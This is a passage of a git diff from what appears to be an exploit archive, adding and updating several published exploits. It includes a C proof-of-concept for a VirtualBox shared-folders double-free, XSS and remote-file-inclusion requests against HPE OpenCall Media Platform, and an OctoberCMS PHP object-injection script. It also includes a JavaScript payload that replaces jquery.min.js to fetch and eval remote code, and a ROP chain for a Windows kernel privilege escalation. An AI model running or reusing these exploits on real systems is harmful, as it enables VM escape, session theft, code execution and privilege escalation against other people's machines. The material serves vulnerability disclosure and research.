00000000`00000000 00000000`00000000 : MSVCR100!endthreadex+0xdf + 00000000`76eaa2e1 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : kernel32!BaseThreadInitThunk+0xd + 00000000`00000000 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : ntdll!RtlUserThreadStart+0x1d +--- cut --- + +When the "Heaps" option is enabled for VirtualBox.exe in Application Verifier, the crash is reported in the following way: + +--- cut --- + 1: kd> g + + ======================================= + VERIFIER STOP 0000000000000007: pid 0xC08: Heap block already freed. + + 000000000DCB1000 : Heap handle for the heap owning the block. + 000000001C37E000 : Heap block being freed again. + 0000000000000000 : Size of the heap block. + 0000000000000000 : Not used + + + ======================================= + This verifier stop is not continuable. Process will be terminated + when you use the `go' debugger command. + + ======================================= + + 1: kd> kb + RetAddr : Args to Child : Call Site + 000007fe`f42437ee : 00000000`00000000 00000000`1c37e000 000007fe`f42415a8 000007fe`f42520b0 : ntdll!DbgBreakPoint + 000007fe`f4249970 : 00000000`265cf5b8 00000000`00000007 00000000`0dcb1000 00000000`1c37e000 : vrfcore!VerifierStopMessageEx+0x772 + 000007fe`f302931d : 00000000`1c186a98 00000000`00000000 00000000`265cf520 00100000`265cf520 : vrfcore!VfCoreRedirectedStopMessage+0x94 + 000007fe`f3026bc1 : 00000000`0dcb1000 00000000`1c37e000 00000000`00000000 00000000`0dcb1000 : verifier!AVrfpDphReportCorruptedBlock+0x155 + 000007fe`f3026c6f : 00000000`0dcb1000 00000000`1c37e000 00000000`0dcb1000 00000000`00002000 : verifier!AVrfpDphFindBusyMemoryNoCheck+0x71 + 000007fe`f3026e45 : 00000000`1c37e000 00000000`00000000 00000000`01001002 00000000`1717ed08 : verifier!AVrfpDphFindBusyMemory+0x1f + 000007fe`f302870e : 00000000`1c37e000 00000000`00000000 00000000`01001002 00000000`0dcb1038 : verifier!AVrfpDphFindBusyMemoryAndRemoveFromBusyList+0x25 + 00000000`76f440d5 : 00000000`00000000 00000000`00000000 00000000`00001000 00000000`00000000 : verifier!AVrfDebugPageHeapFree+0x8a + 00000000`76ee796c : 00000000`0dcb0000 00000000`00000000 00000000`0dcb0000 00000000`00000000 : ntdll!RtlDebugFreeHeap+0x35 + 00000000`76d81a0a : 00000000`0dcb0000 000007fe`efc41b01 00000000`00000000 00000000`1c37e000 : ntdll! ?? ::FNODOBFM::`string'+0xe982 + 00000000`725a8d94 : 00000000`00000087 000007fe`efc3919b 00000000`265cfb10 00000000`1c341f00 : kernel32!HeapFree+0xa + 000007fe`efc58fef : 00000000`00000086 00000000`00001000 00000000`00000000 00000000`67e40fe0 : MSVCR100!free+0x1c + 000007fe`f4923a96 : 00000000`1c342076 00000000`00000000 00000000`00000000 00000000`1c37e000 : VBoxRT+0xc8fef + 000007fe`f4921a48 : 00000000`5c774ff0 00000000`265cfbb0 00000000`00000000 00000000`1c341ff8 : VBoxSharedFolders!VBoxHGCMSvcLoad+0x1686 + 000007fe`ee595c22 : 00000000`63097f60 00000000`63097f60 00000000`25f81f30 00000000`0000018c : VBoxSharedFolders+0x1a48 + 000007fe`ee594a2c : 00000000`00000000 00000000`63097f60 00000000`00000000 00000000`00000000 : VBoxC!VBoxDriversRegister+0x48c62 + 000007fe`efc13b2f : 00000000`25339730 00000000`000004c8 00000000`00000000 00000000`1dce4d30 : VBoxC!VBoxDriversRegister+0x47a6c + 000007fe`efc91122 : 00000000`1dce4d30 00000000`1dce4d30 00000000`00000000 00000000`00000000 : VBoxRT+0x83b2f + 00000000`72561d9f : 00000000`1dce4d30 00000000`00000000 00000000`00000000 00000000`00000000 : VBoxRT+0x101122 + 00000000`72561e3b : 00000000`725f2ac0 00000000`1dce4d30 00000000`00000000 00000000`00000000 : MSVCR100!endthreadex+0x43 + 00000000`76d759bd : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : MSVCR100!endthreadex+0xdf + 00000000`76eaa2e1 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : kernel32!BaseThreadInitThunk+0xd + 00000000`00000000 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : ntdll!RtlUserThreadStart+0x1d +--- cut --- + +Due to the nature of the flaw (heap memory corruption), it could potentially make it possible for an unprivileged guest program to escape the VM and execute arbitrary code on the host, hence we consider it to be a high-severity issue. + +References: +[1] ZwQueryDirectoryFile routine, https://msdn.microsoft.com/en-us/library/windows/hardware/ff567047(v=vs.85).aspx +*/ + +#include +#include + +#include +#include + +extern "C" +NTSTATUS WINAPI NtQueryDirectoryFile( + _In_ HANDLE FileHandle, + _In_opt_ HANDLE Event, + _In_opt_ PIO_APC_ROUTINE ApcRoutine, + _In_opt_ PVOID ApcContext, + _Out_ PIO_STATUS_BLOCK IoStatusBlock, + _Out_ PVOID FileInformation, + _In_ ULONG Length, + _In_ FILE_INFORMATION_CLASS FileInformationClass, + _In_ BOOLEAN ReturnSingleEntry, + _In_opt_ PUNICODE_STRING FileName, + _In_ BOOLEAN RestartScan +); + +typedef struct _FILE_DIRECTORY_INFORMATION { + ULONG NextEntryOffset; + ULONG FileIndex; + LARGE_INTEGER CreationTime; + LARGE_INTEGER LastAccessTime; + LARGE_INTEGER LastWriteTime; + LARGE_INTEGER ChangeTime; + LARGE_INTEGER EndOfFile; + LARGE_INTEGER AllocationSize; + ULONG FileAttributes; + ULONG FileNameLength; + WCHAR FileName[1]; +} FILE_DIRECTORY_INFORMATION, *PFILE_DIRECTORY_INFORMATION; + +int main(int argc, char **argv) { + // Validate command line format. + if (argc != 2) { + printf("Usage: %s \n", argv[0]); + return 1; + } + + // Initialize the PRNG. + srand((unsigned int)time(NULL)); + + // Create a subdirectory dedicated to demonstrating the vulnerability. + CHAR TmpDirectoryName[MAX_PATH]; + _snprintf_s(TmpDirectoryName, sizeof(TmpDirectoryName), "%s\\vbox_crash", argv[1]); + + if (!CreateDirectoryA(TmpDirectoryName, NULL) && GetLastError() != ERROR_ALREADY_EXISTS) { + printf("CreateDirectory failed, %d\n", GetLastError()); + return 1; + } + + // Create 16 files with long (128-byte) names, which appears to always be sufficient to trigger the bug. + CONST UINT kTempFilesCount = 16; + CONST UINT kTempFilenameLength = 128; + CHAR TmpFilename[kTempFilenameLength + 1], TmpFilePath[MAX_PATH]; + + memset(TmpFilename, 'A', kTempFilenameLength); + TmpFilename[kTempFilenameLength] = '\0'; + + for (UINT i = 0; i < kTempFilesCount; i++) { + _snprintf_s(TmpFilePath, sizeof(TmpFilePath), "%s\\%s.%u", TmpDirectoryName, TmpFilename, rand()); + HANDLE hFile = CreateFileA(TmpFilePath, GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL); + if (hFile == INVALID_HANDLE_VALUE) { + printf("CreateFile#1 failed, %d\n", GetLastError()); + return 1; + } + + CloseHandle(hFile); + } + + // Open the temporary directory. + HANDLE hDirectory = CreateFileA(TmpDirectoryName, GENERIC_READ, FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE, NULL, OPEN_EXISTING, FILE_FLAG_BACKUP_SEMANTICS, NULL); + if (hDirectory == INVALID_HANDLE_VALUE) { + printf("CreateFile#2 failed, %d\n", GetLastError()); + return 1; + } + + IO_STATUS_BLOCK iosb; + FILE_DIRECTORY_INFORMATION fdi; + + // Perform the first call, with ReturnSingleEntry set to FALSE. + NtQueryDirectoryFile(hDirectory, NULL, NULL, NULL, &iosb, &fdi, sizeof(fdi), FileDirectoryInformation, FALSE, NULL, TRUE); + + // Now make the same call, but with ReturnSingleEntry=TRUE. This should crash VirtualBox.exe on the host with a double-free exception. + NtQueryDirectoryFile(hDirectory, NULL, NULL, NULL, &iosb, &fdi, sizeof(fdi), FileDirectoryInformation, TRUE, NULL, TRUE); + + // We should never reach here. + CloseHandle(hDirectory); + + return 0; +} diff --git a/platforms/multiple/webapps/41927.txt b/platforms/multiple/webapps/41927.txt new file mode 100755 index 000000000..45d4a7ec0 --- /dev/null +++ b/platforms/multiple/webapps/41927.txt @@ -0,0 +1,1046 @@ +Source: https://blogs.securiteam.com/index.php/archives/3087 + +SSD Advisory – HPE OpenCall Media Platform (OCMP) Multiple Vulnerabilities + +Want to get paid for a vulnerability similar to this one? +Contact us at: ssd@beyondsecurity.com + +Vulnerabilities Summary +The following advisory describes Reflected Cross-Site Scripting (XSS) +vulnerabilities and a Remote File Inclusion vulnerability that when +combined can lead to Code Execution, were found in HP OpenCall Media +Platform (OCMP), version 4.3.2. + +HPE OpenCall Media Platform (OCMP) is a suite of software and hardware +applications which allow implementation of common telecom operator +services such as voicemail, sms (short message service), prepaid, +billing, hlr, etc. It implements industry standard telecom protocols +and standards such as SS7, ISUP, TCAP, SIP, MRCP, RTSP, and VoiceXML. + +HPE OpenCall Media Platform offers a highly scalable, easy-to-manage, +carrier-grade media platform that adapts to future networks and +applications. Through its strong support of open standards and +protocols, new applications can be rapidly developed and deployed in a +way that preserves investments and reduces capital expenditures +(CAPEX) and operational expenditure (OPEX). + +There are 3 different components that are vulnerable in HPE OpenCall +Media Platform (OCMP), and for each component has the following +vulnerabilities: + +Application Content Manager + +Reflected Cross-Site Scripting (XSS) – /mcm/resources/ + + +Platform Administration Tool + +Reflected Cross-Site Scripting (XSS) that lead to Remote Code Execution +Reflected Cross-Site Scripting (XSS) – GetMapAction function, LEV_TYPE0 parameter +Reflected Cross-Site Scripting (XSS) – GetMapAction function, LEV_TYPE1 parameter +Reflected Cross-Site Scripting (XSS) – GetMapAction function, LEV_TYPE2 parameter +Reflected Cross-Site Scripting (XSS) – GetMapAction function, LEV_TYPE3 parameter +Reflected Cross-Site Scripting (XSS) – GetMapAction function, LEV_NAME0 parameter +Reflected Cross-Site Scripting (XSS) – GetMapAction function, LEV_NAME1 parameter +Reflected Cross-Site Scripting (XSS) – GetMapAction function, LEV_NAME2 parameter +Reflected Cross-Site Scripting (XSS) – GetMapAction function, LEV_NAME3 parameter +Reflected Cross-Site Scripting (XSS) – GetMapAction function +Reflected Cross-Site Scripting (XSS) – GetMapAction function, LEV_NUM parameter +Reflected Cross-Site Scripting (XSS) – GetMapAction function, NAME parameter +Reflected Cross-Site Scripting (XSS) – cdrdispatch function, next parameter +Reflected Cross-Site Scripting (XSS) – cdrdispatch function, sessionType parameter + + +VoiceXML Administration Tool + +Reflected Cross-Site Scripting (XSS) – event.do function +Reflected Cross-Site Scripting (XSS) – call.do function +Remote File Inclusion – proxylink.do function + + +Credit +An independent security researcher Paolo Stagno from VoidSec has +reported this vulnerability to Beyond Security’s SecuriTeam Secure +Disclosure program. + +Vendor Responses +HPE has released patches to address this vulnerability, for more details see: +https://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-hpesbgn03686en_us + +Vulnerabilities Details + +Application Content Manager – /mcm/resources/ +HPE OpenCall Media Platform (OCMP) does not sanitize /mcm/resources/ +“description” and “prototype” parameters input. An attacker can inject +malicious Java script to trigger the Reflected Cross-Site Scripting +(XSS). + +Proof of Concept + +An Attacker send the following POST request to the victims machine : + + +POST https://127.0.0.1:8443/mcm/resources/dummy_test/dummy/test?followindirection=false +HTTP/1.1 +Host: 127.0.0.1:8443 +User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) +Gecko/20100101 Firefox/40.0 +Accept: */* +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +DNT: 1 +Content-Type: application/mcm+json; charset=UTF-8 +X-Requested-With: XMLHttpRequest +Referer: https://127.0.0.1:8443/mcm/tenant/mcmcontent.html +Content-Length: 54 +Connection: keep-alive +Pragma: no-cache +Cache-Control: no-cache + +{ "": "", "description": ""} + +The server will respond with: + +HTTP/1.1 204 No Content +X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1 +Date: Wed, 23 Sep 2015 16:13:35 GMT +Server: Web Server + +Then the attacker will send the second request to trigger the +Cross-Site Scripting (XSS): + +GET https://127.0.0.1:8443/mcm/resources/dummy_test/dummy/test?format=json&followindirection=false&ms=1443024815924 +HTTP/1.1 +Host: 127.0.0.1:8443 +User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) +Gecko/20100101 Firefox/40.0 +Accept: */* +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +DNT: 1 +X-Requested-With: XMLHttpRequest +Referer: https://127.0.0.1:8443/mcm/tenant/mcmcontent.html +Connection: keep-alive + +The server will respond with: + +HTTP/1.1 200 OK +X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1 +Cache-control: no-cache +Content-Type: application/json +Transfer-Encoding: chunked +Date: Wed, 23 Sep 2015 16:13:35 GMT +Server: Web Server + + +VoiceXML Administration Tool – call.do function +HPE OpenCall Media Platform (OCMP) does not sanitize call.do function +parameters input. An attacker can inject malicious Java script to +trigger the Reflected Cross-Site Scripting (XSS). + +The vulnerable URL: /om/call.do?action=list_calls&type=XSS_HERE + +Proof of Concept + +An Attacker send the following GET request to the victims machine: + +GET /om/call.do?action=list_calls&type=Active637a3 + + + + + + + + + + + + +
+Logged on as: zerpsta1         +        +



+ + +
+Call Management -> Active637a3c7e9f Calls + +


+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
Calls
 
Server IdCallIdCDRCall MonitoringService IdRemote-URILocal-URISeveresWarningsVoiceXML +ExceptionsStarted AtDuration
tb0ocmp1vxi_dialog_0_32_634_3CDRMonitoro2_ivr_0xxxsip:unavailable@unknown.invalid+15420004705211231021150909 19:00:52.42900:00:00.502
tb0ocmp0vxi_dialog_0_40_420_2CDRMonitoro2_ivr_0xxxsip:unavailable@unknown.invalid+15420004701740231021150908 19:29:05.23600:00:00.501
tb0ocmp1vxi_dialog_0_32_634_2CDRMonitoro2_ivr_0xxxsip:unavailable@unknown.invalid+15420004708524231021150908 19:27:56.23700:00:01.003
tb0ocmp0vxi_dialog_0_40_420_1CDRMonitoro2_ivr_0xxxsip:unavailable@unknown.invalid+15420004706327231021150907 18:57:21.54800:00:01.004
tb0ocmp1vxi_dialog_0_32_634_1CDRMonitoro2_ivr_0xxxsip:unavailable@unknown.invalid+15420004702770231021150907 15:13:19.66000:00:01.003
tb0ocmp0vxi_dialog_0_40_420_0CDRMonitoro2_ivr_0xxxsip:unavailable@unknown.invalid+15420004708608231021150907 15:12:15.25400:00:00.501
tb0ocmp0vxi_dialog_0_32_634_0CDRMonitoro2_ivr_3xxxsip:unavailable@unknown.invalid+1540003000009388000150907 15:00:13.90100:00:45.194
+ +
+ + + +VoiceXML Administration Tool – event.do function +HPE OpenCall Media Platform (OCMP) does not sanitize event.do function +parameters input. An attacker can inject malicious Java script to +trigger the Reflected Cross-Site Scripting (XSS). + +The vulnerable URL: /om/event.do?action=list&type=XSS_HERE + +Proof of Concept + +An Attacker send the following GET request to the victims machine: + +GET /om/event.do?action=list&type=Active637a3 + + + + + + + + + + +
+Logged on as: zerpsta1         +        +



+ + + + + + + + +
+Active637a3c7e9f +

+ + +
+ + + +
+

+ + + + + + + + + + + + + + + + + + + +
Events
 
Server IdDateCallIdCDRService IdMessage
 
No Items Found
+ + + +VoiceXML Administration Tool – proxylink.do function +HPE OpenCall Media Platform (OCMP) does not sanitize proxylink.do +function parameters input. An attacker can inject malicious URL to +including remote files. After the attacker include the file, the HPE +OpenCall Media Platform will parse and execute the content of the +file. + +The vulnerable URL: /om/proxylink.do?url=Remote File Inclusion Here (RFI) + +Proof of Concept + +An Attacker send the following GET request to the victims machine: + +GET /om/proxylink.do?url=http://172.27.120.220:9595/fruuuuk.txt HTTP/1.1 +Accept: text/html, application/xhtml+xml, */* +Accept-Language: en-GB +User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko +Accept-Encoding: gzip, deflate +Host: 172.27.116.32:5443 +DNT: 1 +Connection: Keep-Alive +Cookie: JSESSIONID=5D8C311BBE2784FB2CE6DB970878D3CA + +The server will respond with: + +HTTP/1.1 200 OK +Server: Apache-Coyote/1.1 +Pragma: No-cache +Cache-Control: no-cache +Expires: Thu, 01 Dec 1994 16:00:00 GMT +Content-Type: text/html;charset=ISO-8859-1 +Content-Length: 2565 +Date: Wed, 09 Sep 2015 13:00:53 GMT + + + + +PHISHING LOGIN PAGE + + + + + + + +

PHISHING LOGIN PAGE

+ +
+ + + + +
+ + + + + + +
  + + + + + + + + + + + + + + +
+ User Name  
Password 
 
+ +
+ 		 
+
+
+ + + +Platform Administration Tool – Reflected Cross-Site Scripting (XSS) +that lead to Remote Code Execution +HPE OpenCall Media Platform (OCMP) does not sanitize cdrdispatch +function with parameter cmd=DisplayBaseCdrBrowsePage. An attacker can +inject malicious Java script to trigger the Cross-Site Scripting +(XSS). + +Proof of Concept +An Attacker send the following GET request to the victims machine: + +GET /OCMPOAM/cdrdispatch?cmd=DisplayBaseCdrBrowsePagef5df3_" +icon on the newly created file. Modal window opens which allows to specify a +new filename. + +URL to execute PHP code: +http://victim.site/themes/demo/assets/test.php5?x=ls%20-lah + +6. delete file via PHP object injection +--------------------------------------- + +Authenticated user with "Create, modify and delete CMS partials" or "Create, +modify and delete CMS layouts" can move assets to different folders. This +functionality is vulnerable to PHP object injection. User input is read from +selectedList parameter on line 11 and passed as argument to unserialize(). +Unserialized array object is passed to validatePath() on line 32. + +==================== source start ======================== + 1 validateRequestTheme(); +10 +11 $selectedList = Input::get('selectedList'); +12 if (!strlen($selectedList)) { +13 throw new ApplicationException( + Lang::get('cms::lang.asset.selected_files_not_found')); +14 } +15 +16 $destinationDir = Input::get('dest'); +17 if (!strlen($destinationDir)) { +18 throw new ApplicationException( + Lang::get('cms::lang.asset.select_destination_dir')); +19 } +20 +21 $destinationFullPath = $this->getFullPath($destinationDir); +22 if (!file_exists($destinationFullPath) || + !is_dir($destinationFullPath)) { +23 throw new ApplicationException( + Lang::get('cms::lang.asset.destination_not_found')); +24 } +25 +26 $list = @unserialize(@base64_decode($selectedList)); +27 if ($list === false) { +28 throw new ApplicationException( + Lang::get('cms::lang.asset.selected_files_not_found')); +29 } +30 +31 foreach ($list as $path) { +32 if (!$this->validatePath($path)) { +33 throw new ApplicationException( + Lang::get('cms::lang.asset.invalid_path')); +34 } +35 +36 // ... +==================== source end ======================== + +Following PHP exploit uses the vulnerability. It requires an authenticated +user's session to execute as described previously. + +==================== source start ======================== +_keys = [$path => [ $filename => null]]; + } +} + +class Swift_Mime_SimpleMimeEntity { + private $_headers; + private $_cache; + private $_cacheKey; + + public function __construct($filename, $path = '') { + $this->_headers = new Swift_Mime_SimpleHeaderSet(); + $this->_cache = new Swift_KeyCache_DiskKeyCache($path, + $filename); + $this->_cacheKey = $path; + } +} + +function payload($filename) { + $builder = new Swift_Mime_SimpleMimeEntity($filename); + return base64_encode(serialize([$builder])); +} + +function http($config) { + $ch = curl_init($config['url']); + curl_setopt($ch, CURLOPT_POST, true); + curl_setopt($ch, CURLOPT_POSTFIELDS, + http_build_query($config['data'])); + curl_setopt($ch, CURLOPT_HTTPHEADER, $config['headers']); + curl_setopt($ch, CURLOPT_COOKIE, $config['cookies']); + curl_setopt($ch, CURLOPT_PROXY, $config['proxy']); + curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); + curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); + curl_setopt($ch, CURLOPT_HEADER, false); + curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); + + return curl_exec($ch); +} + +function get_config($url, $filename, $session) { + return [ + 'url' => $url.'/backend/cms', + 'data' => [ + 'dest' => '/', + 'theme' => 'demo', + 'selectedList' => payload($filename), + ], + 'headers' => [ + 'X-OCTOBER-REQUEST-HANDLER: assetList::onMove', + 'X-Requested-With: XMLHttpRequest', + ], + 'cookies' => 'admin_auth='.$session, + 'proxy' => 'localhost:8080', + ]; +} + +$url = 'http://victim.site'; +$session = ''; +$filename = '/tmp/target.txt'; + +echo http(get_config($url, $filename, $session)); +==================== source end ======================== + +7. asset save path modification +------------------------------- + +Authenticated user, with permission to manage website assets, can modify the +path the file is saved to. This allows an attacker to save css, js, less, +sass, scss files at different locations. Attacker can possibly use it to +execute JavaScript on the site, if the application tries to require an +file on +the server that does not exist or the attacker manages to delete the file +beforehand. When an attacker creates a new asset, then the following request +is made. + +Asset management URL: http://victim.site/backend/cms. +Functionality is located at: CMS -> Assets -> Add -> Create file. + +==================== request ======================== +POST /backend/cms HTTP/1.1 +Host: victim.site +Content-Length: 817 +Content-Type: application/x-www-form-urlencoded +X-OCTOBER-REQUEST-HANDLER: onSave +X-Requested-With: XMLHttpRequest +Cookie: admin_auth=...; +Connection: close + +fileName=test.js&content=test&templateType=asset&theme=demo +==================== request end ==================== + +The parameter fileName isn't validated and allows an attacker to specify an +path where the file should be saved to. Overwriting files is forbidden. +If we +specify the file name as ../../../test.js then we can assert that the +file is +created at the root of site's web directory. + +We can execute JavaScript by combining this issue with file deletion +vulnerability via POI. For that, we are going to replace the +modules/backend/ +assets/js/vendor/jquery.min.js file with our own content. It is loaded +on the +page for every authenticated user and allows us as an attacker to take +control +of their session. The payload for this example is the following: + +==================== source start ======================== +var c = new XMLHttpRequest(); +c.open('GET', 'https://code.jquery.com/jquery-1.11.1.js', false); +c.onreadystatechange = () => eval(c.responseText); +c.send(); +var h = () => {location.hash = 'Hacked: ' + (new Date())}; +setInterval(h, 1000); +==================== source end ======================== + +After we delete the jquery.min.js file on the server, we create a new asset +with the payload as the content. + +==================== request ======================== +POST /backend/cms HTTP/1.1 +Host: victim.site +Content-Length: 371 +Content-Type: application/x-www-form-urlencoded +X-OCTOBER-REQUEST-HANDLER: onSave +X-Requested-With: XMLHttpRequest +Cookie: admin_auth=...; +Connection: close + +fileName=../../../modules/backend/assets/js/vendor/jquery.min.js&content= +var+c+%3d+new+XMLHttpRequest()%3b +c.open('GET',+'https%3a//code.jquery.com/jquery-1.11.1.js',+false)%3b +c.onreadystatechange+%3d+()+%3d>+eval(c.responseText)%3b +c.send()%3b +var+h+%3d+()+%3d>+{location.hash+%3d+'Hacked%3a+'+%2b+(new+Date())}%3b +setInterval(h,+1000)%3b +&templateType=asset&theme=demo +==================== request end ==================== + +After the victim authenticates, the payload is executed. For this +example, it +changes the URL hash every second, but can be used to take control of the +victims session. + + +Conclusion +========== + +Authenticated user with permission to manage website assets, upload and +manage +media contents or customize back-end settings can use vulnerabilities found +there to execute PHP code on the server and take control of the application. + +New release v1.0.413 has been made available as a result: + + https://octobercms.com/support/article/rn-8 + https://github.com/octobercms/october/releases/tag/v1.0.413. + + +Timeline +======== + +05.04.2017 | me > developer | first vulnerability discovered +06.04.2017 | me > developer | initial contact +07.04.2017 | me > developer | sent PoC +09.04.2017 | developer > me | developer implemented patches; + requested additional information +09.04.2017 | me > developer | sent PoC with additional information + and findings +10.04.2017 | developer > me | all issues were patched +11.04.2017 | developer > public | new release +11.04.2017 | me > DWF | CVE request +12.04.2017 | me > public | full disclosure + +--- +Anti Anti Räis +Blog: https://bitflipper.eu +Pentester at http://www.clarifiedsecurity.com + diff --git a/platforms/windows/dos/41547.py b/platforms/win_x86-64/dos/41547.py similarity index 100% rename from platforms/windows/dos/41547.py rename to platforms/win_x86-64/dos/41547.py diff --git a/platforms/windows/local/41605.txt b/platforms/win_x86-64/local/41605.txt similarity index 100% rename from platforms/windows/local/41605.txt rename to platforms/win_x86-64/local/41605.txt diff --git a/platforms/win_x86-64/local/41722.c b/platforms/win_x86-64/local/41722.c index aea60fc0d..2a535cce2 100755 --- a/platforms/win_x86-64/local/41722.c +++ b/platforms/win_x86-64/local/41722.c @@ -4,7 +4,7 @@ Check these out: - https://labs.mwrinfosecurity.com/blog/a-tale-of-bitmaps/ Tested on: - Windows 10 Pro x64 (Post-Anniversary) -- ntoskrnl: 10.0.14393.693 +- ntoskrnl.exe: 10.0.14393.953 - FortiShield.sys: 5.2.3.633 Thanks to master @ryujin and @ronin for helping out. And thanks to Morten (@Blomster81) for the MiGetPteAddress :D */ @@ -63,7 +63,7 @@ struct bitmap_structure create_bitmaps(HACCEL hAccel[object_number]) { char *worker_bitmap_memory; HBITMAP manager_bitmap; HBITMAP worker_bitmap; - int nWidth = 0x700; + int nWidth = 0x703; int nHeight = 2; unsigned int cPlanes = 1; unsigned int cBitsPerPel = 8; @@ -170,7 +170,7 @@ HACCEL create_accelerator_table(HACCEL hAccel[object_number], int table_number) LPVOID allocate_rop_chain(LPVOID kernel_base, ULONGLONG fortishield_callback, ULONGLONG fortishield_restore, ULONGLONG manager_pvScan_offset, ULONGLONG worker_pvScan_offset) { HANDLE pid; pid = GetCurrentProcess(); - ULONGLONG rop_chain_address = 0x0000000048ff07da; + ULONGLONG rop_chain_address = 0x000000008aff07da; LPVOID allocate_rop_chain; allocate_rop_chain = VirtualAlloc((LPVOID*)rop_chain_address, 0x12000, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); if (allocate_rop_chain == NULL) { @@ -179,28 +179,28 @@ LPVOID allocate_rop_chain(LPVOID kernel_base, ULONGLONG fortishield_callback, UL } /* */ - ULONGLONG rop_01 = (ULONGLONG)kernel_base + 0x146cdf; // pop rax; pop rcx; ret + ULONGLONG rop_01 = (ULONGLONG)kernel_base + 0x14adaf; // pop rax; pop rcx; ret ULONGLONG rop_02 = fortishield_callback; ULONGLONG rop_03 = 0x0000000000000000; // NULL the callback - ULONGLONG rop_04 = (ULONGLONG)kernel_base + 0xed9c1; // mov qword ptr [rax], rcx ; ret + ULONGLONG rop_04 = (ULONGLONG)kernel_base + 0xb7621; // mov qword ptr [rax], rcx ; ret /* */ /* */ - ULONGLONG rop_05 = (ULONGLONG)kernel_base + 0x146cdf; // pop rax; pop rcx; ret + ULONGLONG rop_05 = (ULONGLONG)kernel_base + 0x14adaf; // pop rax; pop rcx; ret ULONGLONG rop_06 = (ULONGLONG)manager_pvScan_offset; // Manager BitMap pvScan0 offset ULONGLONG rop_07 = (ULONGLONG)worker_pvScan_offset; // Worker BitMap pvScan0 offset - ULONGLONG rop_08 = (ULONGLONG)kernel_base + 0xed9c1; // mov qword ptr [rax], rcx ; ret + ULONGLONG rop_08 = (ULONGLONG)kernel_base + 0xb7621; // mov qword ptr [rax], rcx ; ret /* */ /* */ - ULONGLONG rop_09 = (ULONGLONG)kernel_base + 0x155a; // pop rbx ; ret - ULONGLONG rop_10 = 0x000000004900007b; + ULONGLONG rop_09 = (ULONGLONG)kernel_base + 0x62c0c3; // pop rbx ; ret + ULONGLONG rop_10 = 0x000000008b0000e0; /* */ /* */ - ULONGLONG rop_11 = (ULONGLONG)kernel_base + 0x4551; // pop rax ; ret - ULONGLONG rop_12 = (ULONGLONG)kernel_base + 0x12eef4; // mov rax, rcx ; add rsp, 0x28 ; ret - ULONGLONG rop_13 = (ULONGLONG)kernel_base + 0x3dc8f; // mov rcx, rsi ; call rax + ULONGLONG rop_11 = (ULONGLONG)kernel_base + 0x6292eb; // pop rax ; ret + ULONGLONG rop_12 = (ULONGLONG)kernel_base + 0x556dc9; // mov rax, rcx ; add rsp, 0x28 ; ret + ULONGLONG rop_13 = (ULONGLONG)kernel_base + 0x4115ca; // mov rcx, rsi ; call rax ULONGLONG rop_14 = 0x4141414141414141; // JUNK ULONGLONG rop_15 = 0x4141414141414141; // JUNK ULONGLONG rop_16 = 0x4141414141414141; // JUNK @@ -208,19 +208,19 @@ LPVOID allocate_rop_chain(LPVOID kernel_base, ULONGLONG fortishield_callback, UL /* */ /* */ - ULONGLONG rop_18 = (ULONGLONG)kernel_base + 0xe37a; // pop rcx ; ret + ULONGLONG rop_18 = (ULONGLONG)kernel_base + 0x61260f; // pop rcx ; ret ULONGLONG rop_19 = 0x0000000000000028; // Get the return address - ULONGLONG rop_20 = (ULONGLONG)kernel_base + 0x24752; // sub rax, rcx ; ret + ULONGLONG rop_20 = (ULONGLONG)kernel_base + 0xd8c12; // sub rax, rcx ; ret /* */ /* */ - ULONGLONG rop_21 = (ULONGLONG)kernel_base + 0xe37a; // pop rcx ; ret + ULONGLONG rop_21 = (ULONGLONG)kernel_base + 0x61260f; // pop rcx ; ret ULONGLONG rop_22 = fortishield_restore; - ULONGLONG rop_23 = (ULONGLONG)kernel_base + 0xed9c1; // mov qword ptr [rax], rcx ; ret + ULONGLONG rop_23 = (ULONGLONG)kernel_base + 0xb7621; // mov qword ptr [rax], rcx ; ret /* */ /* */ - ULONGLONG rop_24 = (ULONGLONG)kernel_base + 0x400b2a; // mov qword ptr [rbx + 0x10], rax ; add rsp, 0x20 ; pop rbx ; ret + ULONGLONG rop_24 = (ULONGLONG)kernel_base + 0x4cde3e; // mov qword ptr [rbx + 0x10], rax ; add rsp, 0x20 ; pop rbx ; ret ULONGLONG rop_25 = 0x4141414141414141; // JUNK ULONGLONG rop_26 = 0x4141414141414141; // JUNK ULONGLONG rop_27 = 0x4141414141414141; // JUNK @@ -229,43 +229,43 @@ LPVOID allocate_rop_chain(LPVOID kernel_base, ULONGLONG fortishield_callback, UL /* */ /* */ - ULONGLONG rop_30 = (ULONGLONG)kernel_base + 0x33b4; // pop rsp ; ret + ULONGLONG rop_30 = (ULONGLONG)kernel_base + 0x62b91b; // pop rsp ; ret /* */ char *rop_chain; DWORD rop_chain_size = 0x12000; rop_chain = (char *)malloc(rop_chain_size); - memset(rop_chain, 0x00, rop_chain_size); - memcpy(rop_chain + 0xf7c1, &rop_01, 0x08); - memcpy(rop_chain + 0xf7c9, &rop_02, 0x08); - 